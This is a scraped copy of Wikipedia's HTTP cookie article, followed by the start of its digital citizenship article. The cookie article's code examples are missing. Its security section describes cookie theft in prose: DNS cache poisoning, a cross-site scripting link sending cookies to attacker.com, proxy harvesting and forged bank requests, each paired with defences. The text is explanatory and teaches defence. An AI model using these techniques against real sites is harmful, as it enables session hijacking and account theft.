ThePublic Suffix List[35]helps to mitigate the risk that supercookies pose. The Public Suffix List is a cross-vendor initiative that aims to provide an accurate and up-to-date list of domain name suffixes. Older versions of browsers may not have an up-to-date list, and will therefore be vulnerable to supercookies from certain domains.
The termsupercookieis sometimes used for tracking technologies that do not rely on HTTP cookies. Two suchsupercookiemechanisms were found on Microsoft websites in August 2011:cookie syncingthat respawned MUID (machine unique identifier) cookies, andETagcookies.[36]Due to media attention, Microsoft later disabled this code.[37]In a 2021 blog post, Mozilla used the termsupercookieto refer tothe use of browser cacheas a means of tracking users across sites.[38]
Azombie cookieis data and code that has been placed by aweb serveron a visitor's computer or other device in a hidden location outside the visitor'sweb browser's dedicated cookie storage location, and that automatically recreates a HTTP cookie as a regular cookie after the original cookie had been deleted. The zombie cookie may be stored in multiple locations, such asFlash Local shared object,HTML5 Web storage, and other client-side and even server-side locations, and when absence is detected in one of the locations, the missing instance is recreated by the JavaScript code using the data stored in other locations.[39][40]
A cookie wall pops up on a website and informs the user of the website's cookie usage. It has no reject option, and the website is not accessible without tracking cookies.
A cookie consists of the following components:[41][42][43]
Cookies were originally introduced to provide a way for users to record items they want to purchase as they navigate throughout a website (a virtualshopping cartorshopping basket).[9][10]Today, however, the contents of a user's shopping cart are usually stored in a database on the server, rather than in a cookie on the client. To keep track of which user is assigned to which shopping cart, the server sends a cookie to the client that contains aunique session identifier(typically, a long string of random letters and numbers). Because cookies are sent to the server with every request the client makes, that session identifier will be sent back to the server every time the user visits a new page on the website, which lets the server know which shopping cart to display to the user.
Another popular use of cookies is for logging into websites. When the user visits a website's login page, the web server typically sends the client a cookie containing a unique session identifier. When the user successfully logs in, the server remembers that that particular session identifier has been authenticated and grants the user access to its services.
Because session cookies only contain a unique session identifier, this makes the amount of personal information that a website can save about each user virtually limitless—the website is not limited to restrictions concerning how large a cookie can be. Session cookies also help to improve page load times, since the amount of information in a session cookie is small and requires little bandwidth.
Cookies can be used to remember information about the user in order to show relevant content to that user over time. For example, a web server might send a cookie containing the username that was last used to log into a website, so that it may be filled in automatically the next time the user logs in.
Many websites use cookies for personalization based on the user's preferences. Users select their preferences by entering them in a web form and submitting the form to the server. The server encodes the preferences in a cookie and sends the cookie back to the browser. This way, every time the user accesses a page on the website, the server can personalize the page according to the user's preferences. For example, theGooglesearch engine once used cookies to allow users (even non-registered ones) to decide how many search results per page they wanted to see.
Also,DuckDuckGouses cookies to allow users to set the viewing preferences like colors of the web page.
Tracking cookies are used to track users' web browsing habits. This can also be done to some extent by using theIP addressof the computer requesting the page or therefererfield of theHTTPrequest header, but cookies allow for greater precision. This can be demonstrated as follows:
By analyzing this log file, it is then possible to find out which pages the user has visited, in what sequence, and for how long.
Corporations exploit users' web habits by tracking cookies to collect information about buying habits. TheWall Street Journalfound that America's top fifty websites installed an average of sixty-four pieces of tracking technology onto computers, resulting in a total of 3,180 tracking files.[44]The data can then be collected and sold to bidding corporations.
Cookies are arbitrary pieces of data, usually chosen and first sent by the web server, and stored on the client computer by the web browser. The browser then sends them back to the server with every request, introducingstates(memory of previous events) into otherwise statelessHTTPtransactions. Without cookies, each retrieval of aweb pageor component of a web page would be an isolated event, largely unrelated to all other page views made by the user on the website. Although cookies are usually set by the web server, they can also be set by the client using a scripting language such asJavaScript(unless the cookie'sHttpOnlyflag is set, in which case the cookie cannot be modified by scripting languages).
The cookie specifications[45][46]require that browsers meet the following requirements in order to support cookies:
Cookies are set using theSet-Cookieheader field, sent in an HTTP response from the web server. This header field instructs the web browser to store the cookie and send it back in future requests to the server (the browser will ignore this header field if it does not support cookies or has disabled cookies).
As an example, the browser sends its first HTTP request for the homepage of thewww.example.orgwebsite:
The server responds with twoSet-Cookieheader fields:
The server's HTTP response contains the contents of the website's homepage. But it also instructs the browser to set two cookies. The first,theme, is considered to be asession cookiesince it does not have anExpiresorMax-Ageattribute. Session cookies are intended to be deleted by the browser when the browser closes. The second,sessionToken, is considered to be apersistent cookiesince it contains anExpiresattribute, which instructs the browser to delete the cookie at a specific date and time.
Next, the browser sends another request to visit thespec.htmlpage on the website. This request contains aCookieheader field, which contains the two cookies that the server instructed the browser to set:
This way, the server knows that this HTTP request is related to the previous one. The server would answer by sending the requested page, possibly including moreSet-Cookieheader fields in the HTTP response in order to instruct the browser to add new cookies, modify existing cookies, or remove existing cookies. To remove a cookie, the server must include aSet-Cookieheader field with an expiration date in the past.
The value of a cookie may consist of any printableASCIIcharacter (!through~,Unicode\u0021through\u007E) excluding,and;andwhitespace characters. The name of a cookie excludes the same characters, as well as=, since that is the delimiter between the name and value. The cookie standard RFC 2965 is more restrictive but not implemented by browsers.
The termcookie crumbis sometimes used to refer to a cookie's name–value pair.[47]
Cookies can also be set by scripting languages such asJavaScriptthat run within the browser. In JavaScript, the objectdocument.cookieis used for this purpose. For example, the instructiondocument.cookie = "temperature=20"creates a cookie of nametemperatureand value20.[48]
In addition to a name and value, cookies can also have one or more attributes. Browsers do not include cookie attributes in requests to the server—they only send the cookie's name and value. Cookie attributes are used by browsers to determine when to delete a cookie, block a cookie or whether to send a cookie to the server.
TheDomainandPathattributes define the scope of the cookie. They essentially tell the browser what website the cookie belongs to. For security reasons, cookies can only be set on the current resource's top domain and its subdomains, and not for another domain and its subdomains. For example, the websiteexample.orgcannot set a cookie that has a domain offoo.combecause this would allow the websiteexample.orgto control the cookies of the domainfoo.com.
If a cookie'sDomainandPathattributes are not specified by the server, they default to the domain and path of the resource that was requested.[49]However, in most browsers there is a difference between a cookie set fromfoo.comwithout a domain, and a cookie set with thefoo.comdomain. In the former case, the cookie will only be sent for requests tofoo.com, also known as a host-only cookie. In the latter case, all subdomains are also included (for example,docs.foo.com).[50][51]A notable exception to this general rule is Edge prior to Windows 10 RS3 and Internet Explorer prior to IE 11 and Windows 10 RS4 (April 2018), which always sends cookies to subdomains regardless of whether the cookie was set with or without a domain.[52]
Below is an example of someSet-Cookieheader fields in the HTTP response of a website after a user logged in. The HTTP request was sent to a webpage within thedocs.foo.comsubdomain:
The first cookie,LSID, has noDomainattribute, and has aPathattribute set to/accounts. This tells the browser to use the cookie only when requesting pages contained indocs.foo.com/accounts(the domain is derived from the request domain). The other two cookies,HSIDandSSID, would be used when the browser requests any subdomain in.foo.comon any path (for examplewww.foo.com/bar). The prepending dot is optional in recent standards, but can be added for compatibility with RFC 2109 based implementations.[53]
TheExpiresattribute defines a specific date and time for when the browser should delete the cookie. The date and time are specified in the formWdy, DD Mon YYYY HH:MM:SS GMT, or in the formWdy, DD Mon YY HH:MM:SS GMTfor values of YY where YY is greater than or equal to 0 and less than or equal to 69.[54]
Alternatively, theMax-Ageattribute can be used to set the cookie's expiration as an interval of seconds in the future, relative to the time the browser received the cookie. Below is an example of threeSet-Cookieheader fields that were received from a website after a user logged in:
The first cookie,lu, is set to expire sometime on 15 January 2013. It will be used by the client browser until that time. The second cookie,made_write_conn, does not have an expiration date, making it a session cookie. It will be deleted after the user closes their browser. The third cookie,reg_fb_gate, has its value changed todeleted, with an expiration time in the past. The browser will delete this cookie right away because its expiration time is in the past. Note that cookie will only be deleted if the domain and path attributes in theSet-Cookiefield match the values used when the cookie was created.
As of 2016[update]Internet Explorer did not supportMax-Age.[55][56]
TheSecureandHttpOnlyattributes do not have associated values. Rather, the presence of just their attribute names indicates that their behaviors should be enabled.
TheSecureattribute is meant to keep cookie communication limited to encrypted transmission, directing browsers to use cookies only viasecure/encryptedconnections. However, if a web server sets a cookie with a secure attribute from a non-secure connection, the cookie can still be intercepted when it is sent to the user byman-in-the-middle attacks. Therefore, for maximum security, cookies with the Secure attribute should only be set over a secure connection.
TheHttpOnlyattribute directs browsers not to expose cookies through channels other than HTTP (and HTTPS) requests. This means that the cookie cannot be accessed via client-side scripting languages (notablyJavaScript), and therefore cannot be stolen easily viacross-site scripting(a pervasive attack technique).[57]
Most modern browsers support cookies and allow the user to disable them. The following are common options:[58]
Add-on tools for managing cookie permissions also exist.[59][60][61][62]
Cookies have some important implications for the privacy and anonymity of web users. While cookies are sent only to the server setting them or a server in the same Internet domain, a web page may contain images or other components stored on servers in other domains. Cookies that are set during retrieval of these components are calledthird-party cookies. A third-party cookie, belongs to a domain different from the one shown in the address bar. This sort of cookie typically appears when web pages feature content from external websites, such asbanner advertisements. This opens up the potential fortrackingthe user's browsing history and is used by advertisers toserve relevant advertisementsto each user.
As an example, suppose a user visitswww.example.org. This website contains an advertisement fromad.foxytracking.com, which, when downloaded, sets a cookie belonging to the advertisement's domain (ad.foxytracking.com). Then, the user visits another website,www.foo.com, which also contains an advertisement fromad.foxytracking.comand sets a cookie belonging to that domain (ad.foxytracking.com). Eventually, both of these cookies will be sent to the advertiser when loading their advertisements or visiting their website. The advertiser can then use these cookies to build up a browsing history of the user across all the websites that have ads from this advertiser, through the use of theHTTP refererheader field.
As of 2014[update], some websites were setting cookies readable for over 100 third-party domains.[63]On average, a single website was setting 10 cookies, with a maximum number of cookies (first- and third-party) reaching over 800.[64]
The older standards for cookies, RFC 2109[17]and RFC 2965, recommend that browsers should protect user privacy and not allow sharing of cookies between servers by default. However, the newer standard, RFC 6265, explicitly allows user agents to implement whichever third-party cookie policy they wish. Most modern web browsers containprivacy settingsthat canblockthird-party cookies. Since 2020,Apple Safari,[65]Firefox,[66]andBrave[67]block all third-party cookies by default. Safari allows embedded sites to use Storage Access API to request permission to set first-party cookies. In May 2020,Google Chrome83 introduced new features to block third-party cookies by default in its Incognito mode for private browsing, making blocking optional during normal browsing. The same update also added an option to block first-party cookies.[68]In April 2024, Chrome postponed third-party cookie blocking by default to 2025.[69]In July 2024, Google announced plan to avoid blocking third-party cookies by default and instead prompt users to allow third-party cookies.[70]
The possibility of building a profile of users is a privacy threat, especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.
Website operators who do not disclose third-party cookie use to consumers run the risk of harming consumer trust if cookie use is discovered. Having clear disclosure (such as in aprivacy policy) tends to eliminate any negative effects of such cookie discovery.[71][failed verification]
TheUnited Statesgovernment set strict rules on setting cookies in 2000 after it was disclosed that the White Housedrug policy officeused cookies to track computer users viewing its online anti-drug advertising. In 2002, privacy activist Daniel Brandt found that theCIAhad been leaving persistent cookies on computers that had visited its website. When notified it was violating policy, CIA stated that these cookies were not intentionally set and stopped setting them. On December 25, 2005, Brandt discovered that theNational Security Agency(NSA) had been leaving two persistent cookies on visitors' computers due to a software upgrade. After being informed, the NSA immediately disabled the cookies.[72]
In 2002, the European Union launched theDirective on Privacy and Electronic Communications(e-Privacy Directive), a policy requiring end users' consent for the placement of cookies, and similar technologies for storing and accessing information on users' equipment.[73][74]In particular, Article 5 Paragraph 3 mandates that storing technically unnecessary data on a user's computer can only be done if the user is provided information about how this data is used, and the user is given the possibility of denying this storage operation. The Directive does not require users to authorise or be provided notice of cookie usage that are functionally required for delivering a service they have requested, for example to retain settings, store log-in sessions, or remember what is in a user's shopping basket.[75]
In 2009, the law was amended by Directive 2009/136/EC, which included a change to Article 5, Paragraph 3. Instead of having an option for users to opt out of cookie storage, the revised Directive requires consent to be obtained for cookie storage.[74]The definition of consent is cross-referenced to the definition in European data protection law, firstly the Data Protection Directive 1995 and subsequently theGeneral Data Protection Regulation(GDPR). As the definition of consent was strengthened in the text of the GDPR, this had the effect of increasing the quality of consent required by those storing and accessing information such as cookies on users devices. In a case decided under the Data Protection Directive however, theCourt of Justice of the European Unionlater confirmed however that the previous law implied the same strong quality of consent as the current instrument.[76]In addition to the requirement of consent which stems from storing or accessing information on a user's terminal device, the information in many cookies will be considered personal data under the GDPR alone, and will require a legal basis to process. This has been the case since the 1995 Data Protection Directive, which used an identical definition of personal data, although the GDPR in interpretative Recital 30 clarifies that cookie identifiers are included. While not all data processing under the GDPR requires consent, the characteristics of behavioural advertising mean that it is difficult or impossible to justify under any other ground.[77][78]
Consent under the combination of the GDPR and e-Privacy Directive has to meet a number of conditions in relation to cookies.[79]It must be freely given and unambiguous: preticked boxes were banned under both the Data Protection Directive 1995[76]and the GDPR (Recital 32).[80]The GDPR is specific that consent must be as 'easy to withdraw as to give',[80]meaning that a reject-all button must be as easy to access in terms of clicks and visibility as an 'accept all' button.[79]It must be specific and informed, meaning that consent relates to particular purposes for the use of this data, and all organisations seeking to use this consent must be specifically named.[81][82]TheCourt of Justice of the European Unionhas also ruled that consent must be 'efficient and timely', meaning that it must be gained before cookies are laid and data processing begins instead of afterwards.[83]
The industry's response has been largely negative. Robert Bond of the law firm Speechly Bircham describes the effects as "far-reaching and incredibly onerous" for "all UK companies". Simon Davis ofPrivacy Internationalargues that proper enforcement would "destroy the entire industry".[84]However, scholars note that the onerous nature of cookie pop-ups stems from an attempt to continue to operate a business model through convoluted requests that may be incompatible with the GDPR.[77]
Academic studies and regulators both describe widespread non-compliance with the law. A study scraping 10,000 UK websites found that only 11.8% of sites adhered to minimal legal requirements, with only 33.4% of websites studied providing a mechanism to reject cookies that was as easy to use as accepting them.[79]A study of 17,000 websites found that 84% of sites breached this criterion, finding additionally that many laid third party cookies with no notice at all.[85]The UK regulator, theInformation Commissioner's Office, stated in 2019 that the industry's 'Transparency and Consent Framework' from the advertising technology group theInteractive Advertising Bureauwas 'insufficient to ensure transparency and fair processing of the personal data in question and therefore also insufficient to provide for free and informed consent, with attendant implications for PECR [e-Privacy] compliance.'[81]Many companies that sell compliance solutions (Consent Management Platforms) permit them to be configured in manifestly illegal ways, which scholars have noted creates questions around the appropriate allocation of liability.[86]
AW3Cspecification calledP3Pwas proposed for servers to communicate their privacy policy to browsers, allowing automatic, user-configurable handling. However, few websites implement the specification, and the W3C has discontinued work on the specification.[87]
Third-party cookies can be blocked by most browsers to increase privacy and reduce tracking by advertising and tracking companies without negatively affecting the user's web experience on all sites. Some sites operate 'cookie walls', which make access to a site conditional on allowing cookies either technically in a browser, through pressing 'accept', or both.[88]In 2020, theEuropean Data Protection Board, composed of all EU data protection regulators, stated that cookie walls were illegal.
In order for consent to be freely given, access to services and functionalities must not be made conditional on the consent of a user to the storing of information, or gaining of access to information already stored, in the terminal equipment of a user (so called cookie walls).[89]
Many advertising operators have an opt-out option to behavioural advertising, with a generic cookie in the browser stopping behavioural advertising.[90][91]However, this is often ineffective against many forms of tracking, such as first-party tracking that is growing in popularity to avoid the impact of browsers blocking third party cookies.[92][93]Furthermore, if such a setting is more difficult to place than the acceptance of tracking, it remains in breach of the conditions of the e-Privacy Directive.[79]
Most websites use cookies as the only identifiers for user sessions, because other methods of identifying web users have limitations and vulnerabilities. If a website uses cookies as session identifiers, attackers can impersonate users' requests by stealing a full set of victims' cookies. From the web server's point of view, a request from an attacker then has the same authentication as the victim's requests; thus the request is performed on behalf of the victim's session.
Listed here are various scenarios of cookie theft and user session hijacking (even without stealing user cookies) that work with websites relying solely on HTTP cookies for user identification.
Traffic on a network can be intercepted and read by computers on the network other than the sender and receiver (particularly overunencryptedopenWi-Fi). This traffic includes cookies sent on ordinary unencryptedHTTP sessions. Where network traffic is not encrypted, attackers can therefore read the communications of other users on the network, including HTTP cookies as well as the entire contents of the conversations, for the purpose of aman-in-the-middle attack.
An attacker could use intercepted cookies to impersonate a user and perform a malicious task, such as transferring money out of the victim's bank account.
This issue can be resolved by securing the communication between the user's computer and the server by employingTransport Layer Security(HTTPSprotocol) to encrypt the connection. A server can specify theSecureflag while setting a cookie, which will cause the browser to send the cookie only over an encrypted channel, such as a TLS connection.[45]
If an attacker is able to cause aDNS serverto cache a fabricated DNS entry (calledDNS cache poisoning), then this could allow the attacker to gain access to a user's cookies. For example, an attacker could use DNS cache poisoning to create a fabricated DNS entry off12345.www.example.comthat points to theIP addressof the attacker's server. The attacker can then post an image URL from his own server (for example,http://f12345.www.example.com/img_4_cookie.jpg). Victims reading the attacker's message would download this image fromf12345.www.example.com. Sincef12345.www.example.comis a sub-domain ofwww.example.com, victims' browsers would submit allexample.com-related cookies to the attacker's server.
If an attacker is able to accomplish this, it is usually the fault of theInternet Service Providersfor not properly securing their DNS servers. However, the severity of this attack can be lessened if the target website uses secure cookies. In this case, the attacker would have the extra challenge[94]of obtaining the target website's TLS certificate from acertificate authority, since secure cookies can only be transmitted over an encrypted connection. Without a matching TLS certificate, victims' browsers would display a warning message about the attacker's invalid certificate, which would help deter users from visiting the attacker's fraudulent website and sending the attacker their cookies.
Cookies can also be stolen using a technique called cross-site scripting. This occurs when an attacker takes advantage of a website that allows its users to post unfilteredHTMLandJavaScriptcontent. By posting malicious HTML and JavaScript code, the attacker can cause the victim's web browser to send the victim's cookies to a website the attacker controls.
As an example, an attacker may post a message onwww.example.comwith the following link:
When another user clicks on this link, the browser executes the piece of code within theonclickattribute, thus replacing the stringdocument.cookiewith the list of cookies that are accessible from the current page. As a result, this list of cookies is sent to theattacker.comserver. If the attacker's malicious posting is on an HTTPS websitehttps://www.example.com, secure cookies will also be sent to attacker.com in plain text.
It is the responsibility of the website developers to filter out such malicious code.
Such attacks can be mitigated by using HttpOnly cookies. These cookies will not be accessible by client-side scripting languages like JavaScript, and therefore, the attacker will not be able to gather these cookies.
In older versions of many browsers, there were security holes in the implementation of theXMLHttpRequestAPI. This API allows pages to specify a proxy server that would get the reply, and this proxy server is not subject to thesame-origin policy. For example, a victim is reading an attacker's posting onwww.example.com, and the attacker's script is executed in the victim's browser. The script generates a request towww.example.comwith the proxy serverattacker.com. Since the request is forwww.example.com, allexample.comcookies will be sent along with the request, but routed through the attacker's proxy server. Hence, the attacker would be able to harvest the victim's cookies.
This attack would not work with secure cookies, since they can only be transmitted overHTTPSconnections, and the HTTPS protocol dictatesend-to-end encryption(i.e. the information is encrypted on the user's browser and decrypted on the destination server). In this case, the proxy server would only see the raw, encrypted bytes of the HTTP request.
For example, Bob might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references an action on Bob's bank's website (rather than an image file), e.g.,
If Bob's bank keeps his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.
Cookiejackingis an attack againstInternet Explorerwhich allows the attacker to stealsession cookiesof a user by tricking a user into dragging an object across the screen.[95]Microsoft deemed the flaw low-risk because of "the level of required user interaction",[95]and the necessity of having a user already logged into the website whose cookie is stolen.[96]Despite this, a researcher tried the attack on 150 of their Facebook friends and obtained cookies of 80 of them viasocial engineering.[95]
Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are often at odds with the Representational State Transfer (REST) software architectural style.[97][98]
If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence, cookies do not identify a person, but a combination of a user account, a computer, and a web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.[99]
Likewise, cookies do not differentiate between multiple users who share the sameuser account, computer, and browser.
Some of the operations that can be done using cookies can also be done using other mechanisms.
AJSON Web Token(JWT) is a self-contained packet of information that can be used to store user identity and authenticity information. This allows them to be used in place of session cookies. Unlike cookies, which are automatically attached to each HTTP request by the browser, JWTs must be explicitly attached to each HTTP request by the web application.
The HTTP protocol includes thebasic access authenticationand thedigest access authenticationprotocols, which allow access to a web page only when the user has provided the correct username and password. If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.
Thequery stringpart of theURLis the part that is typically used for this purpose, but other parts can be used as well. TheJava ServletandPHPsession mechanisms both use this method if cookies are not enabled.
This method consists of the web server appending query strings containing a unique session identifier to all the links inside of a web page. When the user follows a link, the browser sends the query string to the server, allowing the server to identify the user and maintain state.
These kinds of query strings are very similar to cookies in that both contain arbitrary pieces of information chosen by the server and both are sent back to the server on every request. However, there are some differences. Since a query string is part of a URL, if that URL is later reused, the same attached piece of information will be sent to the server, which could lead to confusion. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user bye-mail, those preferences will be used for that other user as well.
Moreover, if the same user accesses the same page multiple times from different sources, there is no guarantee that the same query string will be used each time. For example, if a user visits a page by coming from a pageinternal to the sitethe first time, and then visits the same page by coming from anexternalsearch enginethe second time, the query strings would likely be different. If cookies were used in this situation, the cookies would be the same.
Other drawbacks of query strings are related to security. Storing data that identifies a session in a query string enablessession fixationattacks,refererlogging attacks and othersecurity exploits. Transferring session identifiers as HTTP cookies is more secure.
Another form of session tracking is to useweb formswith hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks. In fact, if the form is handled with theHTTPGET method, then this technique is similar to using URL query strings, since the GET method adds the form fields to the URL as a query string. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be sent in the HTTP request body, which is neither part of the URL, nor of a cookie.
This approach presents two advantages from the point of view of the tracker. First, having the tracking information placed in the HTTP request body rather than in the URL means it will not be noticed by the average user. Second, the session information is not copied when the user copies the URL (to bookmark the page or send it via email, for example).
All current web browsers can store a fairly large amount of data (2–32 MB) via JavaScript using theDOMpropertywindow.name. This data can be used instead of session cookies. The technique can be coupled withJSON/JavaScript objects to store complex sets of session variables on the client side.
The downside is that every separate window ortabwill initially have an emptywindow.nameproperty when opened.
In some respects, this can be more secure than cookies due to the fact that its contents are not automatically sent to the server on every request like cookies are, so it is not vulnerable to network cookie sniffing attacks.
Some users may be tracked based on theIP addressof the computer requesting the page. The server knows the IP address of the computer running the browser (or theproxy, if any is used) and could theoretically link a user's session to this IP address.
However, IP addresses are generally not a reliable way to track a session or identify a user. Many computers designed to be used by a single user, such as office PCs or home PCs, are behind a network address translator (NAT). This means that several PCs will share a public IP address. Furthermore, some systems, such asTor, are designed to retainInternet anonymity, rendering tracking by IP address impractical, impossible, or a security risk.
Because ETags are cached by the browser, and returned with subsequent requests for the same resource, a tracking server can simply repeat any ETag received from the browser to ensure an assigned ETag persists indefinitely (in a similar way to persistent cookies). Additional caching header fields can also enhance the preservation of ETag data.
ETags can be flushed in some browsers by clearing thebrowser cache.
The browser cache can also be used to store information that can be used to track individual users. This technique takes advantage of the fact that the web browser will use resources stored within the cache instead of downloading them from the website when it determines that the cache already has the most up-to-date version of the resource.
For example, a website could serve a JavaScript file with code that sets a unique identifier for the user (for example,var userId = 3243242;). After the user's initial visit, every time the user accesses the page, this file will be loaded from the cache instead of downloaded from the server. Thus, its content will never change.
Abrowser fingerprintis information collected about a browser's configuration, such as version number, screen resolution, and operating system, for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.
Basicweb browserconfiguration information has long been collected byweb analyticsservices in an effort to accurately measure real humanweb trafficand discount various forms ofclick fraud. With the assistance ofclient-side scriptinglanguages, collection of much more esoteric parameters is possible.[100][101]Assimilation of such information into a single string constitutes a device fingerprint. In 2010,EFFmeasured at least 18.1 bits ofentropypossible from browser fingerprinting.[102]Canvas fingerprinting, a more recent technique, claims to add another 5.7 bits.
Some web browsers support persistence mechanisms which allow the page to store the information locally for later use.
TheHTML5standard (which most modern web browsers support to some extent) includes a JavaScript API calledWeb storagethat allows two types of storage: local storage and session storage. Local storage behaves similarly topersistent cookieswhile session storage behaves similarly tosession cookies, except that session storage is tied to an individual tab/window's lifetime (AKA a page session), not to a whole browser session like session cookies.[103]
Internet Explorer supports persistent information[104]in the browser's history, in the browser's favorites, in an XML store ("user data"), or directly within a web page saved to disk.
Some web browser plugins include persistence mechanisms as well. For example,Adobe FlashhasLocal shared objectandMicrosoft Silverlighthas Isolated storage.[105]
|
https://en.wikipedia.org/wiki/HTTP_cookie
|
The termdigital citizenis used with different meanings. According to the definition provided byKaren Mossberger, one of the authors ofDigital Citizenship: The Internet, Society, and Participation,[1]digital citizens are "those who use the internet regularly and effectively." In this sense, a digital citizen is a person usinginformation technology(IT) in order to engage in society, politics, and government.
More recent elaborations of the concept define digital citizenship as the self-enactment of people’s role in society through the use of digital technologies, stressing the empowering and democratizing characteristics of the citizenship idea. These theories aim at taking into account the ever increasingdataficationof contemporary societies (as can be symbolically linked to theSnowden leaks), which radically called into question the meaning of “being (digital) citizens in a datafied society”,[2]also referred to as the “algorithmic society”,[3]which is characterised by the increasing datafication of social life and the pervasive presence of surveillance practices – seesurveillanceandsurveillance capitalism, the use ofartificial intelligence, andBig Data.
Datafication presents crucial challenges for the very notion of citizenship, so thatdata collectioncan no longer be seen as an issue of privacy alone[2]so that:
We cannot simply assume that being a citizen online already means something (whether it is the ability to participate or the ability to stay safe) and then look for those whose conduct conforms to this meaning[4]
Instead, the idea of digital citizenship shall reflect the idea that we are no longer mere “users” of technologies since they shape our agency both as individuals and as citizens.
Digital citizenship is the responsible and respectful use of technology to engage online, find reliable sources, and protect and promote human rights.[1][2][3][4]It teaches skills to communicate, collaborate, and act positively on any online platform.[2][3]It also teaches empathy, privacy protection, and security measures to prevent data breaches and identity theft.
In the context of the algorithmic society, the question of digital citizenship "becomes one of the extents to which subjects are able to challenge, avoid or mediate their data double in this datafied society”.[2]
These reflections put the emphasis on the idea of the digital space (orcyberspace) as a political space where the respect of fundamental rights of the individual shall be granted (with reference both to the traditional ones as well as to new specific rights of the internet [see “digital constitutionalism”]) and where the agency and the identity of the individuals as citizens is at stake. This idea of digital citizenship is thought to be not only active but also performative, in the sense that “in societies that are increasingly mediated through digital technologies, digital acts become important means through which citizens create, enact and perform their role in society.”[2]
In particular, for Isin and Ruppert this points towards an active meaning of (digital) citizenship based on the idea that we constitute ourselves as digital citizen by claiming rights on the internet, either by saying or by doing something.[4]
People who characterize themselves as digital citizens often use IT extensively—creatingblogs, usingsocial networks, and participating inonline journalism.[5]Although digital citizenship begins when any child, teen, or adult signs up for anemail address, posts pictures online, usese-commerceto buy merchandise online, and/or participates in any electronic function that isB2BorB2C, the process of becoming a digital citizen goes beyond simple internet activity. According toThomas Humphrey Marshall, a British sociologist known for his work onsocial citizenship, a primary framework of citizenship comprises three different traditions:liberalism,republicanism, andascriptivehierarchy. Within this framework, the digital citizen needs to exist in order to promote equal economic opportunities and increasepolitical participation.[6]In this way, digital technology helps to lower thebarriers to entryfor participation as a citizen within a society.
They also have a comprehensive understanding of digital citizenship, which is the appropriate and responsible behavior when using technology.[7]Since digital citizenship evaluates the quality of an individual's response to membership in a digital community, it often requires the participation of all community members, both visible and those who are less visible.[8]A large part in being a responsible digital citizen encompasses digital literacy, etiquette,online safety, and an acknowledgement of private versus public information.[9][10][11]The development of digital citizen participation can be divided into two main stages.[12]
The first stage is throughinformation dissemination, which includes subcategories of its own:[12]
The second stage of digital citizen participation iscitizen deliberation, which evaluates what type of participation and role that they play when attempting to ignite some sort of policy change.
One of the primary advantages of participating in online debates through digital citizenship is that it incorporatessocial inclusion. In a report oncivic engagement, citizen-powered democracy can be initiated either through information shared through the web, direct communication signals made by the state toward the public, and social media tactics from both private and public companies.[13]In fact, it was found that the community-based nature of social media platforms allow individuals to feel more socially included and informed about political issues that peers have also been found to engage with, otherwise known as a "second-order effect."[14]Understanding strategic marketing on social media would further explain social media customers’ participation.Two types of opportunities rise as a result, the first being the ability to lower barriers that can make exchanges much easier. In addition, they have the chance to participate in transformative disruption, giving people who have a historically lower political engagement to mobilize in a much easier and convenient fashion.
Nonetheless, there are several challenges that face the presence of digital technologies in political participation. Both current as well as potential challenges can create significant risks for democratic processes. Not only is digital technology still seen as relatively ambiguous, it was also seen to have "less inclusivity in democratic life."[15]Demographic groups differ considerably in the use of technology, and thus, one group could potentially be more represented than another as a result of digital participation. Another primary challenge consists in the ideology of a "filter bubble" effect. Alongside a tremendous spread of false information, internet users could reinforce existing prejudices and assist in polarizing disagreements in the public sphere. This can lead to misinformed voting and decisions based on exposure rather than on pure knowledge. Acommunication technologydirector, Van Dijk,[16]stated, "Computerized information campaigns and mass public information systems have to be designed and supported in such a way that they help to narrow the gap between the 'information rich' and 'information poor' otherwise the spontaneous development of ICT will widen it." Access and equivalent amounts of knowledge behind digital technology must be equivalent in order for a fair system to put into place.
Alongside a lack of evidenced support for technology that can be proven to be safe for citizens, theOECDhas identified five struggles for the online engagement of citizens:[17]
Highly developed states possess the capacity to link their respective governments with digital sites. Such sites function in ways such as publicizing recent legislation, current, and future policy objectives; lending agency toward political candidates; and/or allowing citizens to voice themselves in a political way. Likewise, the emergence of these sites has been linked to increased voting advocacy. Lack of access to technology can be a serious obstacle in becoming a digital citizen, since many elementary procedures such as tax report filing, birth registration, and use of websites to support candidates in political campaigns (e-democracy) have become available solely via the internet. Furthermore, many cultural and commercial entities only publicize information on web pages. Non-digital citizens will not be able to retrieve this information, and this may lead tosocial isolationoreconomic stagnation.[citation needed]
The gap between digital citizens and non-digital citizens is often referred as thedigital divide. Indeveloping countries, digital citizens are fewer. They consist of the people who use technology to overcome local obstacles including development issues, corruption, and even military conflict.[18]Examples of such citizens include users ofUshahididuring the2007 disputed Kenyan electionand protesters in theArab Springmovements who used media to document repression of protests. Currently, the digital divide is a subject of academic debate as access to the internet has increased in these developing countries, but the place in which it is accessed (work, home, public library, etc.) has a significant effect on how much access will be used, if even in a manner related to the citizenry. Recent scholarship has correlated the desire to be technologically proficient with greater belief in computer access equity, and thus, digital citizenship (Shelley, et al.).[full citation needed]
On the other side of the divide, one example of a highly developed digital technology program in a wealthy state is thee-Residency of Estonia. This form of digital residency allows both citizens and non-citizens of the state to pursue business opportunities in a digital business environment.[19]The application is simple; residents can fill out a form with their passport and photograph alongside the reason for applying. Following a successful application, the "e-residency" will allow them to register a company, sign documents, make online banking declarations, and file medical prescriptions online, though they will be tracked through financial footprints. The project plans to cover over 10 million e-residents by 2025 and as of April 2019,[update]there were over 54,000 participants from over 162 countries that have expressed an interest, contributing millions of dollars to the country's economy and assisting in access to any public service online.[20]Other benefits include hassle-free administration, lower business costs, access to the European Union market, and a broad range of e-services.[21]Though the program is designed for entrepreneurs, Estonia hopes to value transparency and resourcefulness as a cause for other companies to implement similar policies domestically. In 2021, Estonia's neighborLithuanialaunched a similare-Residency program.[22]
